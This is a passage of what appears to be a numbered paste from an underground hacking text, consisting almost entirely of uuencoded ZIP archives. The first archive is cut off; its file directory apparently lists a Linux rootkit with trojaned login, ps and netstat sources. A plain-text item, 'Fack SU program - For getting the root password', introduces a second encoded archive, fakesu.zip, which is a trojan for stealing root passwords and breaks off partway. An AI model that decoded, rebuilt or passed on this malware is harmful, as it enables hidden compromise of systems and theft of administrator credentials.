  11734. M0JS^^N;CN\'AI\]4T(+IRYO(ICH*WD6F=!7!`O)9Y1+HDHL[0W!>XYAB-]_M
  11735. M,92><=(KS&,5AZ=<TR?^^1I$49=$[G-,=1N%#V'M!(#L['1P^%^<T*0W?)XM
  11736. ML8$TG6/'X.+MX<GPW>'1P<DI[(<7&'T6)R.&X8H8\N7QX\]D7\C]UBC\1.HE
  11737. M6W0ZXN^EY^2^&QO1Y\9Z9>.DVX*&R;4H.MUKZ1A4P-E.70=U55AWE8-HPMKY
  11738. MDLP(.[Q&:.+6CZ-P5RS:=:E+SK+/5"QS.KNPR>O$8WT6&]6/N5L+'[&]JJX0
  11739. MN%;R<IYLL7)RW%606`5?'D4FC*X1^-S7;EDW*G^:95IDM-4Y#S1=F'_4*45<
  11740. M_CBQ;FPWVK^T$VRU!]E-,B08S#<;CIRTBD2]L3]^5-?MF%/F<.NS<S9.B#*+
  11741. M>&8I45$W*E$1U%_-RQ@I+.7W.!(I(L[O\0]D!W%THRLW(IO$O9?;Q<Y_OE$R
  11742. MQ_]OU0-;-?J36^6RIO*<)N?[-@M;=SYO7CWJ*@:9.I-M65Q5R[YG(^L*KZ`4
  11743. M[9M9M=:%C6SP3VF*\+M3^:%Z/24YRP>7!$KD_N,CQ>!I,0TI$X?(-D'H/S]K
  11744. M:*,6]UFM$S3JJ?4K;6RMK$%:)+9'Y\4-!4Y"?==3U''(SU^OO%='%S26*O]T
  11745. M?%%+\6TC_6E>C:SC2//@9\4P:A^GB)O</I3;E5[K`*@B_MX=XS5EUV]EG+D>
  11746. MY=J,ZZ234L6'$T^JSTTF.HRXF(94EW*30B9Q2U>MVYY\'Z>:\D_DK??)16Y)
  11747. MNGR9,;,?!U18U002",3RW66^5E1.]97<=_N!:;`O=*^/4]RIGT'"A(H+PQ=5
  11748. M'=ER`\%]ZRAJ(6_AS$4@7&MKJ-=<`>0=Y4;Q#(I^A-R[+!H0"F/YEA<6*#GN
  11749. M+6J^T$!J,R:SQOP&2\QUIGW;KJ&P+M=E,"+YBC+=UD&))[U>5D"Y2P#"H\ZO
  11750. M,51JCIO,<\V9.^7,-4EG\0QW2:;:H+(V)R"OH'L;K\D@T4)V1(@=']R;6)6K
  11751. MKS>?'8_4M3J5(>?:OKK"(S[WZ>86P#DE:7RB($P\V)5+[BU6VKPX2V_6S;F)
  11752. M2^<L3UD9_=IX3=?.N*2^Q/+D3L1I)<>*?7?'K*<R=@M+"R[#EB<%[B97F-F\
  11753. MU41J3K44<6H^K8!^%<:C!73+3QR%W!V9?_Q#>3R.4>*`06+]_FF-MWF9T"F=
  11754. M?+@S;KZ"P1Z$&^D8A64\+]1:;+5D,S$9^K3Q.H<GDAJ+VE1>95&;ZNG6\V_Y
  11755. MF*(TH\MDY5FH5C;^:M3*DU#^/FW\1?-.V%\)W2]87'U$)7-E4=ASCW+C>H=.
  11756. M#ZFD@T1+VGF'\*D>VOY>'@B5=&XYR]W$`G:>]N;GD[4]+?N23"=]@WW2ZN5+
  11757. MM=/CK6F,8@D2K9X\KLBCR*-ZI%;>R+D=22WB9.7ZJFTA%?#<HMG5/J[8X0+7
  11758. MIOKP:=<=#=9'5.79H%6/J^%!>WPP1Z!R=T_"%RM;.Z&B:@V^?KM%OU?PF[=S
  11759. MGN_F';B::^)FW<TS"1D@.(Y$Z2O]<5_Y/`O)PX.=RB6Z?%HZ4$U.$NXV]5]=
  11760. M%KZAMC^71WMSWEPZMKQYZ0X`8Y:^;@7.`=9H<IYX=3%S[F9'!8;GTLD:.9$O
  11761. M%MP4N/N;O&E>E+0NW77;H5-&4$^B409O$R6!%C#B&^ON,_5KK`>GGM@(6D<!
  11762. M'ON8%=;][X=F)):8V<X.[KG7T49BU16$"CI)W6#^>QJ'S2[5MS_H_B\_/`S(
  11763. M^`-?PI\@&P[]F;<JF(!__7%_>=UCZW)%Y8UR?M?@`#TIPF/E\9S=>D2Q,(1:
  11764. MNFS;_--WX;=-E.)(_;;0HVAW*:H^#F@W^7^@"NFPSCR8ELN)+E]P&L).1OIS
  11765. M`;*\I-9C'7!WK\K==W19`2I=B]+$%6[*R+:\>(^'E8$CFM#XE?SK9UJ74P,*
  11766. MAB.^FGTOI.[Q?_"2)V!:+4_L>EWK53$2[#U'@<!>@P*].A+TR$HSHO*<.XDE
  11767. M<+/I6&\<QY8@F3P.=2_+F\[/+QZ=[I<W$XBN:I.M<D^J\/,+.0TN!8T0T$1"
  11768. MO;*H(Z]=KMQ37SE$'LEQETLLRR&=E75$S?O^%NT_C:8.':VOUH)>K26]6HMZ
  11769. MM2GK52=L'ED+>+4AX=5*Q,QGZ0^/]>2%4HC[/T+5>O)`H]PC#7*/9IR7K52/
  11770. MD]P(\S40!<?H2C&JAI+IJ@&C:NZK5K>&ZKT%XTM^!UC`BZ_S2YQ5W)7":'/'
  11771. M"4>+O68+AM6W]5M<.(LOE]RR]OVVJZ_O<LHQ&]V8I"OA9%Z(%GF1$';O5<=[
  11772. M\M]KNOU[2)608YY&^=_9!&K)?VH#D04:I;>0_TM(KH)<27U!O<[G_ZUK?:JZ
  11773. MU_>57'\AH?_?5J[OIXTC"#\??\4EE841-3*5^@"4Y"&T:A]2(814J2%*7>S(
  11774. M5N'L<K8C(O&_=[_YL3NSM^>$J#P`>[>_=W9V9O;[CA2=5F!('GK;>8[S&)<^
  11775. MJ]F4$Y^7]W\O9OR_3)^!&:`LS<<'(IAP-LR,36..;!KF>4P?C]4[,RH0E*P/
  11776. MF2_G#\J$Z2_B^6/G>*@;<S)"=\$UX^I?:2&+AK`:#-3`X+5>+\%];1Y9KEXH
  11777. M)$(U5P%$]!;1]`DM47)W@:N>K$&>Q0G-WK[W8(TO:#RNY$L:/U9]1#&S(Z"/
  11778. MW3,25_LZ`;?\DPN%<JD41'=/X5F<[SKF8_GHR?:G9F/)Z<EUI;E$ICK9$AR,
  11779. MI[6^H`L4@+]J]@OT_H:F*-A%[(?;.I[H]GVOLALS[FDJ%GDI]34];NMV<P_U
  11780. M`1EFPQ&EAQOV"5;!/-5(#=N?["P<[542!-#M%;UD=2YT4?BBONBBZY9(M?3E
  11781. M#!Y?;("H7%7K&M5F-MVN]%6I%>SLH=:G-1$2I`&1)`@>-`/N6A\Y-!MIE=@!
  11782. MF)R%CW#@PB;M<Q?K,.W*6,U@-=(19WIT7KL"0G6K9$[RUSI`F9S\M:J*BOJK
  11783. MVB$+B@B6L"!=5NN;("%BOJ3T64[Z@SFPQ-/0$$&`(>T-_.I+\:"3DQ.!7NQJ
  11784. M*.0ZV[5!B*E=V^,N<G2GK`9U.$:ACW:'G]QA<9BDS1P9ATF\*)K$ZR[QB2`S
  11785. M%+B0X9F3Y7!GPQ)CHW4K!+&,`J<+_32>GX+%ZP:8SB-_[@U=NKAPK'0Y8&Z/
  11786. MR*%)E5<\.UHTH%LZ/G"ZA0WW:NS@?8-IBE<&0VYJ#*"0B&91^)^U=K"A]S1\
  11787. M@\*B\J.!)P:_'J/6H(J5:4U2UL<4M&.PLNBD0K<HP#48B&D5DR*"ID?I'=M?
  11788. M,8F%RCII)I>C3>8!1:)B3K>"G-<]\KF-['%>\\#G--+#.<T#CH5EL?,N(!G?
  11789. M[2"YI;N&_=82@[T`V/M$4K&Z1NE6,6CMV^7J4>+9=[/MA`S$C\MXHX%=P98+
  11790. MX=0ZZCC?:O3X+,NIXMW)JPJZJY9+N55%=+5T*;=A+VL(RIB2:3*,"W$I%T<>
  11791. M9^?M<\.841A:J#!X&Y2WLT%_87CDW/#>F'W`*!#Y)`M(>0HO)PH<&W#=#7V+
  11792. M`W#_W_T#9W$2J""^/OZ!UC;'S\@M;)]<L<7H@.[!L&H8E$>?QZCKX1\`?:P-
  11793. M\5N+)TR\(,P!6^?"K^M@L!$/%,9!J#P\^"T85ZO5DK[O,=,ZVOG,\*+;A+S_
  11794. M)#=6=/!\FN!;,HOUT8&?'`]N<Q"[;*B_JK%(E-%U1E7.H;AB2=^J_<Q&ZQQ&
  11795. MJXUIWC00GM'U<E5?!6NG!1%YS+R6.]Q@6DUG/[HR:,]R$B$]:_CJ0M(WC5-D
  11796. M4L'K^N6R>5F?AC\?<8-N^!?9JUA2;D3\:]LW;NOR`=L`3@Y(34$.P/!;-)M9
  11797. MN1L%TN>II=82=+2S0!%\6'%(#'X0=A8)JQCN:<87QEN)W&>YX>%\E8<__+X<
  11798. MV2D,\U,>O.RA;HO_8(VQJWB<8FCX1FXF;R81#>5IK%1SI0@^511T0\.P`+VJ
  11799. MTJD'$SI,-:H*?=-P.VM9Q:"<)=-8K.&18FOQ8UDT5CJ)5HSZ!U/F+0F0XMWQ
  11800. MC^]#6[*D^-5+M/P>/='VI?AY_#B)Z9>^R[H6BP!?^O/56U,"(QZ:B2'>5C[/
  11801. M-(2P5>THPE]F8IS2`H=2W)RI"T;'`T<CF:1!J_)4$+!&!(Q3W]D-?EG\N,*8
  11802. M(\+-W>)^L9Y-#V31]"CPJX9QQC<)#(H&/1+SW)PE]#JC$Q3[_O`,47U@&OA7
  11803. M"^NV5U*YIO];5H6F+NL<FJ&O`'V+E&Y51//N;`ORR9F/QU:2>SE\.C%%294!
  11804. M)%D-8]@IJ=OGB*E&;3S;[D5*%97AF\X1L^N\Z->)[3,$C3^BY+X>T"]N*@$7
  11805. ME#O[P(`1,;^[&(-GES;;8R(REL9HMI>?WQ1GRL>C3$.]R071L!Z-ZGFP:?Z:
  11806. M[Y,>",;+"J?]09_EKJBTQ*8Z^H(%X]#Y:KT][?T'4$L#!!0````(`&&%2QUX
  11807. M;\M7C00``(H*```-````<',O=VAA='1I;64N8Y56;6_;1@S^'/T*3H-=R9$=
  11808. MVRF*-6ZR`JTW=$N6(DD_#&E@G*63?8VD$^XEKC?LOX\\G5^3=!W@2"<>^9!\
  11809. M2-[EJ`,W<Z$!?PR,$@^"%6!K(TH.M9(SQ<H>P`>8<\6G2U"\X$QS,&3C]P/H
  11810. M@*B,1"':V&DA4LADR43E+#.ATX*)$EA%]KJ6E19340BSA%PJ!T40'@VZW2Y8
  11811. M="$,,`-+:17(105*Z'O$BQC&FI,KQ6%!#X3M]6#4C0FD6XITSGAQ_T7.*RTK
  11812. MB/RB?*LM^C6\9ZNTQS-+ZF1Q(3.1"YX!9G?.E%K"KXKS"D5%!IC43#R@#R@E
  11813. MNC**9<((62%'TIK:FH0@4FDK0S$KG0`W*84Y\R!O9\QJW5/6S'#[.<?E_1=@
  11814. M,V2,/.;B*SK,^0*,0,JF=E8(KGM/F/W6@W=R4?`EF;$L0PZQ$**:N5+X*I9<
  11815. M:S;C3H4`-%89-2+'O:QC)-`E*DE=_,71?\%ACM("]3"7P6NX8`I?KX]]$$=!
  11816. M\*.HTL)F'-YHDPG9FY_MB@HQW9>1VUU9GE:FV!792J#UKHS2V-,R9;T'O]1'
  11817. M0J9[<.%BSDQC'FY)45E4N21AH`TSV+#8-0JISF\'PY_N1D$FL8^Q[@^WQ_@5
  11818. MN-V.=O1.&EZC!RFR&/X.@!BU*38`!N4>S?<(=P3U15V*RAJ.O6'K.;:S6V1L
  11819. MJ4?.UKEWBF@ZR3,XA>Y@95PISK($:NF5G2-30@?E!85!8GI/#)!(\U16F5Z;
  11820. MVY+:DCY]1DWP$]3#,$16-$M,\:B#A5?:P(P;USZI58HCAFLB*GGC*&IO^8D)
  11821. M>14*!E[(M%D_UL(44*&A,(^0Z01":`VSDU9_F+4T0)@$!P<KK.Z9*2=$5FLP
  11822. MA)_A2?$)#(:/;)#KY+$ZG,%@@#AA789H%[(RC)N<B5\W`1AX:@MFN$N>E6ZF
  11823. M9;Z:HH8`7_KV#HOM-8V$";ZXF&R$J<;;C,,11*_Z'?P-7\:^H"D><IX.6T.X
  11824. MYNKP%(Y=&7.(&D0\.&"]MT4D')(0[5L9H%Z+EJL62U;&\,,I#&*B0#L&&D?K
  11825. MWGPFVE?]1LNU+>IL])_::U8M&+[<Q]ZL6]Y.Y)$W^.^T?)/XM-8CY"%=(AQ[
  11826. M[3OH<=T1[AI3%S0G.!4>)V;*E2L\G>>^[JX(?CS?0+\9>]B:6%GS*OIT<_%Q
  11827. M\LN'\W$"EY.K]Y=_G/_I@GO6'L/E2DD5A62/\[!&\':8V%=AHH'__">@/WQ@
  11828. MMOQ^A9A`_SR!Z_'X]\GU^*;I03_X&)EC>S&G,QUQO&-WK.`FO38P[<WAE8#&
  11829. MJX!86(NV4O'F"![[,*<HN=]7>#)3M_-=F6Y#8?<^#FB-G?MJX\V!7K#"4T:C
  11830. M8!@>@O_'5[0![UDS,<N:4Y:?KL=7DX]7E^_&U]<QM-O!P9YBQ4I^V[^C*%]\
  11831. M[K^(5ZSX*AP>CE:%^W:;NY[S\^MMDTTI<8!I?MWXZK"I<R%9QAYF41MOJOX=
  11832. MEA#?`_\>WC4ZW_#I[/&6XPK_0SB!5F^(Y]#FZ8YD\-`>>0M8<6-51;?F*,#L
  11833. MZ$*$QU=D0%7ROL.6_EQA<KLW:1R3_;]02P,$%`````@`C(5+'<(K5\!S````
  11834. MG`````T```!P<R]W:&%T=&EM92YHT]=2*,](+"G)S$W5RU#0U=55*$Y-10@E
  11835. M*Z3E%RFD5A3D).8EEF3FYREHZ7-Q*6>FY:6DIBG$QX=[.(:$>/JZQGMP*0-%
  11836. M,O-2406YRO(S4Q0*BC+S2N)+"T!&:H!$-*VYDC,2BQ2TBK%)<2FGYJ5DIG$!
  11837. M`%!+`0(4!@H``````+2^1"+=R\9L*````"@````.``````````$`(`"V@0``
  11838. M``!L:6YU>"YR;V]T+FMI=%!+`0(4!@H``````+(;/B(````````````````&
  11839. M````````````$`#_050```!L;V=I;B]02P$"%`84````"`!TGDL=R>L>:7<$
  11840. M``#7"P``"P`````````!`"``MH%X````;&]G:6XO9FEX+F-02P$"%`84````
  11841. M"`#.G4L=EKDFE]D!``!N`P``#P`````````!`"``MH$8!0``;&]G:6XO9V5T
  11842. M<&%S<RYC4$L!`A0&%`````@`N9U+'<(GG7W&(@``I%H```T``````````0`@
  11843. M`+:!'@<``&QO9VEN+VQO9VEN+F-02P$"%`84````"`"YG4L=O.J[7C,$```T
  11844. M"0``#@`````````!`"``MH$/*@``;&]G:6XO36%K969I;&502P$"%`84````
  11845. M"`#%G4L=-9MQ6KT!``"U`P``$0`````````!`"``MH%N+@``;&]G:6XO<&%T
  11846. M:&YA;65S+FA02P$"%`8*``````"Q&SXB````````````````"```````````
  11847. M`!``_T%:,```;F5T<W1A="]02P$"%`84````"`"B:5`=0OU.EGX```#V````
  11848. M$``````````!`"``MH&`,```;F5T<W1A="]C;VYF:6<N:%!+`0(4!A0````(
  11849. M`,)\4!W)ZQYI=P0``-<+```-``````````$`(`"V@2PQ``!N971S=&%T+V9I
  11850. M>"YC4$L!`A0&"@``````L1L^(@````````````````P````````````0`/]!
  11851. MSC4``&YE='-T870O;&EB+U!+`0(4!A0````(`'!C4!T.[^U8K@(``"(&```0
  11852. M``````````$`(`"V@?@U``!N971S=&%T+VQI8B]A9BYC4$L!`A0&%`````@`
  11853. M<&-0'9[4Q17N!@``A!$``!(``````````0`@`+:!U#@``&YE='-T870O;&EB
  11854. M+V%X,C4N8U!+`0(4!A0````(`'!C4!V=`,XSX@0``-`+```3``````````$`
  11855. M(`"V@?(_``!N971S=&%T+VQI8B]E=&AE<BYC4$L!`A0&%`````@`<&-0'9EC
  11856. MA1=2!```(@D``!4``````````0`@`+:!!44``&YE='-T870O;&EB+V=E=&%R
  11857. M9W,N8U!+`0(4!A0````(`/!Z4!UG_V3I!`,``.0%```5``````````$`(`"V
  11858. M@8I)``!N971S=&%T+VQI8B]G971S;V-K+F-02P$"%`84````"`!P8U`=HZ6G
  11859. M>0,#``"?!P``$``````````!`"``MH'!3```;F5T<W1A="]L:6(O:'<N8U!+
  11860. M`0(4!A0````(`'!C4!T::Z]`>P8``*P0```2``````````$`(`"V@?)/``!N
  11861. M971S=&%T+VQI8B]I;F5T+F-02P$"%`84````"`!P8U`=7(PDR^D"``"@!0``
  11862. M%@`````````!`"``MH&=5@``;F5T<W1A="]L:6(O;&]O<&)A8VLN8U!+`0(4
  11863. M!A0````(`$"I41T!'JB`M````"8!```4``````````$`(`"V@;I9``!N971S
  11864. M=&%T+VQI8B]-86ME9FEL95!+`0(4!A0````(`'!C4!V6Y9WUC@(``)P$```1
  11865. M``````````$`(`"V@:!:``!N971S=&%T+VQI8B]P<'`N8U!+`0(4!A0````(
  11866. M`'!C4!U1NK5:M@,``,X+```2``````````$`(`"V@5U=``!N971S=&%T+VQI
  11867. M8B]S;&EP+F-02P$"%`84````"`"C9%`=(OH;U($"``#<!0``%0`````````!
  11868. M`"``MH%#80``;F5T<W1A="]L:6(O<W5P<&]R="YH4$L!`A0&%`````@`<&-0
  11869. M'?.ZS?LZ`P``3P<``!(``````````0`@`+:!]V,``&YE='-T870O;&EB+W5N
  11870. M:7@N8U!+`0(4!A0````(`"BI41T5-&WC_@```(T!```0``````````$`(`"V
  11871. M@6%G``!N971S=&%T+TUA:V5F:6QE4$L!`A0&%`````@``JA1'=DI'P]R&```
  11872. MC60``!$``````````0`@`+:!C6@``&YE='-T870O;F5T<W1A="YC4$L!`A0&
  11873. M%`````@`B&-0'7BPS!U-`@``(P8``!,``````````0`@`+:!+H$``&YE='-T
  11874. M870O<&%T:&YA;65S+FA02P$"%`84````"`#NJ%$=!7O0U?(````J`@``#@``
  11875. M```````!`"``MH&L@P``;F5T<W1A="]214%$34502P$"%`8*``````"(8U`=
  11876. MWU8BXSP````\````$0`````````!`"``MH'*A```;F5T<W1A="]V97)S:6]N
  11877. M+FA02P$"%`8*``````"Q&SXB````````````````#````````````!``_T$U
  11878. MA0``;F5T<W1A="UO;&0O4$L!`A0&%`````@`[F92':9A;%ZO'@``SET``!$`
  11879. M`````````0`@`+:!7X4``&YE='-T870M;VQD+S(N=75E4$L!`A0&%`````@`
  11880. M!&52'<GK'FEW!```UPL``!$``````````0`@`+:!/:0``&YE='-T870M;VQD
  11881. M+V9I>"YC4$L!`A0&%`````@`HF12'1X)?UV7````W@```!0``````````0`@
  11882. M`+:!XZ@``&YE='-T870M;VQD+TUA:V5F:6QE4$L!`A0&%`````@`Z692';#5
  11883. ML++I$P``!$0``!,````````````@`+:!K*D``&YE='-T870M;VQD+VYE='-T
  11884. M87102P$"%`84````"``B8E(=>('M0=`0``!"3P``%0`````````!`"``MH'&
  11885. MO0``;F5T<W1A="UO;&0O;F5T<W1A="YC4$L!`A0&%`````@`W&92'6?_?4_M
  11886. M&0``YD```!4````````````@`+:!R<X``&YE='-T870M;VQD+VYE='-T870N
  11887. M;U!+`0(4!A0````(`%:\;AS15/5GB`$``&8#```7``````````$`(`"V@>GH
  11888. M``!N971S=&%T+6]L9"]P871H;F%M97,N:%!+`0(4!A0````(`%EE4AW._=J#
  11889. M#0$``$,"```2``````````$`(`"V@:;J``!N971S=&%T+6]L9"]214%$3450
  11890. M2P$"%`8*``````"R&SXB`````````````````P```````````!``_T'CZP``
  11891. M<',O4$L!`A0&%`````@`885+'>_UZOU9`0``P`(```H``````````0`@`+:!
  11892. M!.P``'!S+V%L;&]C+F-02P$"%`84````"`!AA4L=81V![NP,``#_)@``#```
  11893. M```````!`"``MH&%[0``<',O8V]M<&%R92YC4$L!`A0&%`````@`A(5+';`@
  11894. M8^'H!0``X@P```P``````````0`@`+:!F_H``'!S+V1E=FYA;64N8U!+`0(4
  11895. M!A0````(`'.>2QW)ZQYI=P0``-<+```(``````````$`(`"V@:T``0!P<R]F
  11896. M:7@N8U!+`0(4!A0````(`&.%2QWS!)RV#P8``/<1```+``````````$`(`"V
  11897. M@4H%`0!P<R]-86ME9FEL95!+`0(4!A0````(`&&%2QV/_G#35!,``-TT```'
  11898. M``````````$`(`"V@8(+`0!P<R]P<RYC4$L!`A0&%`````@`>(5+'?4?3;)6
  11899. M!```<@D```<``````````0`@`+:!^QX!`'!S+W!S+FA02P$"%`84````"`!H
  11900. MA4L=[2;RL!8"``"K!```"P`````````!`"``MH%V(P$`<',O<'-D871A+FA0
  11901. M2P$"%`84````"`!AA4L=\J)3_EH!``"K`@``#``````````!`"``MH&U)0$`
  11902. M<',O<'=C86-H92YC4$L!`A0&%`````@`!(9+'7ZS"CSQ`0``L@0```P`````
  11903. M`````0`@`+:!.2<!`'!S+W-I9VYA;',N8U!+`0(4!A0````(`/:%2QU3-?""
  11904. M/@$``"("```,``````````$`(`"V@50I`0!P<R]S:6=N86QS+FA02P$"%`84
  11905. M````"`!AA4L=KBQ3ILH/```D.```"0`````````!`"``MH&\*@$`<',O<VYA
  11906. M<"YC4$L!`A0&%`````@`885+'=R=/V/"````90$```L``````````0`@`+:!
  11907. MK3H!`'!S+W-T871U<RYC4$L!`A0&%`````@`885+'4//N6GZ`@``Q0@```P`
  11908. M`````````0`@`+:!F#L!`'!S+W-Y<VEN9F\N8U!+`0(4!A0````(`(^%2QTO
  11909. M1`.>F@```!(!```,``````````$`(`"V@;P^`0!P<R]S>7-I;F9O+FA02P$"
  11910. M%`84````"`#7A4L=`&,*=E<<``#14```"``````````!`"``MH&`/P$`<',O
  11911. M=&]P+F-02P$"%`84````"`!AA4L=>&_+5XT$``"*"@``#0`````````!`"``
  11912. MMH']6P$`<',O=VAA='1I;64N8U!+`0(4!A0````(`(R%2QW"*U?`<P```)P`
  11913. M```-``````````$`(`"V@;5@`0!P<R]W:&%T=&EM92YH4$L%!@`````Y`#D`
  11914. *?`T``%-A`0````$`
  11915. `
  11916. end
  11917.  
  11918. 4. Fack SU program - For getting the root password.
  11919.  
  11920. begin 644 fakesu.zip
  11921. M4$L#!!0````(`"\B1")UVD\.'0P``#DP```(`!``8V]N9FEG+FA56`P`DZ/X
  11922. M,KH,]S+\`0``M9I;<Z-&%H#?\RNZ)@_*IF;&ZTTJ^[!.JC#",C42L(!\>\$8
  11923. M6E*O$4WHQAK-K]]S&B0+A&@EFZV:&NL"7Y]S^EP;7?Q($IXOV/+SZC,A$YK3
  11924. M,I8T)7$E^3J6+(FS;$M>MLU554GALA\OOKLXN(_E`[<N2KX^N)GE",-+5C1.
  11925. M:5G3$#>F"Y93PA:$Y\2P'\A/G[\CA`1;(>F:U%<+(OB:2K:F@J3U]7+%A+KP
  11926. MGI+_5$*239Q+(CF)WS@#84A)U95,,N#2LN0E@=M%O&PT^9XM<KB"1,9T&@7N
  11927. MW#<M%.?[JONINICF*5MTY*T$RY<$M.5)_#G9VZ<AF(AP3:.C)TA(UX7<(D"N
  11928. M*'FEVPTO4Y)RT"WGH`<O7[LLL"-H>`3B\(>#K$LJ7W[YYT<RL<)K_%N_)PM0
  11929. MV2SC[:=_D#A/ZY>/,X\(9=K:>B&8D2RJ/%%F@M<E_;UB8#MU]TXW(JJBX*7$
  11930. M+9(K+NB>T57:-QZC(#3,+X$UB2QGW!$:H>/)_(%LF%R1*Z!<I,L(_D0L7_#/
  11931. MJ]^Z0'7QD>)H.+DME/8THVN:2T%8KCZ/2]"3""K1X9[!%,N25X48*77GHE+>
  11932. MB=Z#VE(0@Y;DF>5R1$"VYR5+(SEJ/*1Q-3#KQ'?G7A"%1'W?\0-<%1?*>)S&
  11933. M;\O1NSUS2E.!`K]04E8Y2E6!<\)"\`I076UAI:EKC(V[2>3Y]IT]M296UX1`
  11934. MJ\6%E94!T1`"3*=<*!_))D*Z;"7Y<=!M>456\1MM]OHCB04$SUX#C)HX*7G;
  11935. M(K?&G;5S[\M3P*O&>T`R=#\FB5CQ*DO1&)4`#_L!W1W6F&>R9%__=G*)Z+9W
  11936. MD92CLFJIMZ($DRS(2P7:\_JS*.5%F<NN&11W['J^$_8:HVQ<&R#@(>!6?)/W
  11937. M[VXO^7T'ATRM@AR3Q_-Z'1>CW9*8.7NL,)L9WFDSH_<)62XP.P[+%H3^36C/
  11938. MK%-ZR[)*((76JLMU](T?>Y$"A;/HR77Z.8?;TC!:VX+BTJ^2EGF<U;&*<2F_
  11939. MY?&:]N@>/CD&2#RH_6[WV\JW,'<03DYXT^:`EA'DG6P?QK$<";*!/PIK0MI=
  11940. M%RR#_(`;@][0M49S<U\EF]F._="]/E*?#ML?D$*J+8@A@420-=9T_;*KF.\L
  11941. M9VH'8836B>:.[3H#_G:EF/OLNK-,30"OF)MAVS*88S*>+_]PDN&+15^243Y:
  11942. M^_B^SA4E?V,I)9X;@*$NR8+&$CH%R,E?$UI(]`I5)%2JKE<[RI>1NCFZ/*C4
  11943. MQR;`)(P:,<QFT$RH(B0D[#*F):X*`"R2+U6F[BN_S3*]BZ"IJERP)8CWA\TE
  11944. MV#?Z;B][UU+4WL?615W:XCH3+_8I.FWI]YKS#=Z"%DNA=">[RT''Y)5`^=N`
  11945. M&5'I@_3VKUKQ#8-:#IEYP[(,\C(BVFU<2M,JP>9.8@'[A$D&"JFJ\-'8]BTS
  11946. M1-?[C?R=_/J;6@J-N(FAH5FQ)5HV3E/85$'%\5U7/7=E?#-\TZ_U32U%&Q6K
  11947. M'$V1?]>V<1?0ZYS/060'/X[J6J=:";6-Z"7U+NY;,_3;@I;9MKN7L$X8S0S3
  11948. M=X/HVG>_6$,1B6L:3F##-M<=+EE`HA'M^`S"L1G=6L;8\H-V?(+:37]\1WQH
  11949. M@&+8Q9^/!+KS?^X7(8',(N(%A?UE>9)5$(4O?->/J2UN:O95\Z8M%]:0Z-X.
  11950. M;Z/@$7HBNS\_EVU<2I,LQO#>EYFNO%!5;.<=^==T/55/UX.A8.4)+RF9SXRC
  11951. M)(V?#=\!MOY)E0N5IJ]8_GN$GE*)BZ2H\!4*AK'$H&V'[44?54(??-VWZL_1
  11952. M3R=J`SA=`@&A$A='*^+,('8)DI(UAYJ!28@M('!SE3U?MA(D9R5\\T/&7BF9
  11953. M<;B79[':VL`S?/,CQ(SZRLXES=3G=\;#W[JRW;O^&)S:GD!#;QL]?EVGK?<F
  11954. M:3<-[3S&/.R+NC6X++)HWZ8C[?W-;F]5X)604(XJ\/NU@\U<+8<`UW7-R;WM
  11955. M!$\8X[@E,(JI$;C=AZM+=N[HA8]_ELYX(C,='^X*I\?^?HG+.--@-Y516"MM
  11956. MV]5RC.NI%>%%7:M>MO)-$DNPE%`[7#=HNW$9.G$R<>9H2`E]66^_9QHA[%\P
  11957. M:(114Z39+BD_[P*=EFO&Q:AN:9IF!OT3.[Z4)%&V#]M6RV9&4]NQ-'HU4O])
  11958. MO4"IT'HX-0=@K<T@=ZG4C".XC"&>R=2,9E80&!,KZ)'ZX-O^I'@P76#@7F!D
  11959. M7U2%ZMY%01,&;3$NV,/V?->,YM[IA'O`AO)P!_-6G$)O4,1"U/D"S:1Z,?4%
  11960. MJ'9X&--:*[@UQNY]=_+:>65G^"B28CO4?0>A9WJ/FA%F*S*^'*0\!E-W,J3Y
  11961. M:%]=*KDN6@[7>%LEHQ6DRA[Z/(QNW2`<%O(*N5^QZAQ4[5[7FH<S[P',=^1:
  11962. MRJO4;B=QLL*D\80-G2@89&LU>WA<L*^[<YA.2X#C\%357],P;ZVCW<%<"@HG
  11963. MH'W3V92TR.)$]9'O4WU[$.\JT`".$I*"ORK9_P=X#1C,I\!\K<,#HA>&.UXR
  11964. MN57.*P[>'PS-XJ,J>%5=D)]SEM#1KO@>S4VVB:%DN[Y]E->;HR7T%4QA^#J%
  11965. MR:ED@#YR2@_Z2HAS\D&L/L'7F?B@4.%*)0O(N#3?=^[-D*Z&C`^8ECY\5/HT
  11966. MC,YYDS./]G"\N+U`)Q95&[DW/J03R55O!,,U[D#\TLTED$9"-WSTNAD*@,N\
  11967. MBO9G"7]TCW?\/>"0=FHNBQY<SW)VH]5^1`-9UC'T)4WQ@$Q5P]6``J-*8U)8
  11968. M?%%EX`GK%YX='4:&EC^SH1MW+`O:E]9"O=O^1DMQL%^G=_X.&G(<)3Y<?K[\
  11969. MY<,9C<&N%F[`)V'D&[TW'W1]W!U@<V`_6=@>>*$UTXP14127RV]1PJN##>I)
  11970. M<%%D^).GR'3GCB;+-<0<"^O@@5*#=$[5T"-D'0)L,5@M&FH0^K8SL6\T=>,%
  11971. M9A\5KP/$:R.P],=(+PD?+F/7IJNK8LFJY'QP&\Q;WW4U&Y"4VV(8XC]Z&D::
  11972. M['JCP2T<FT--T,&179XN2SKL83`=3'Q+YUU`*C9ZDG>O)2TR#@/1`.9FZKJ^
  11973. MAM%S;-IFG&JWWAE@Z&23#D'`QN;]6$M):<;6&L[8FMHS+:F9B891]4,-+0L;
  11974. MII<M'LEH>-@_73\:X['&YGNF+F[W3'WP-LPSB6?QFEGV+SCOWW4R\9)B^M<(
  11975. MZ.'P`/E?*R"Z+E^D\6#2PO`&#W9OQH8F=P$1ZFDI5A0*[#!Q'D`%O+6FTV$B
  11976. M?":C7/)X"`=#7A@YH3OP)*EFL3.\VG;LL]R:B5@DC`VB`B,P;7N8@ZWR<-&8
  11977. M63/M[`,4?%XY3`DL33I<\W3P&<C,'=]H"%6^CHM!QMS1/HPJ8.0<C!G/O=<$
  11978. M2X&G9'@HE&*.8(F&IXY>,3=BHK!-';R"SOQM2$MO'EK.W;"6^,AIB('/FS03
  11979. M+]7)`5NNE4.<E_B"<Q.?P,2'!Q\:FII$=:S?2TW[$?S;UW4>0E>A`WV%_HN.
  11980. M*&290+>)L_$@R3>AWS1G^F>VT"WJ2+>:6HH44>0Z3.`Y6D[]&YEAD.7[NHX*
  11981. M2&<H=I9F\$^#@7]:BN2#Y0P0H:LI9(I2Z3%S'6<K\'<NFE,NV[EQ_W^'9>\4
  11982. M^4U3=<(G;=&I=(EGKD\Y5S@;]AZJM7\,@E-A_T]!#E%%?(%]QSD\SZB[#QUT
  11983. MD>1XBJ\#WIA..-7#H*\\0SJ870R]9#`O,/4X24.#F<$.`SVN.?+6XE3RU^+6
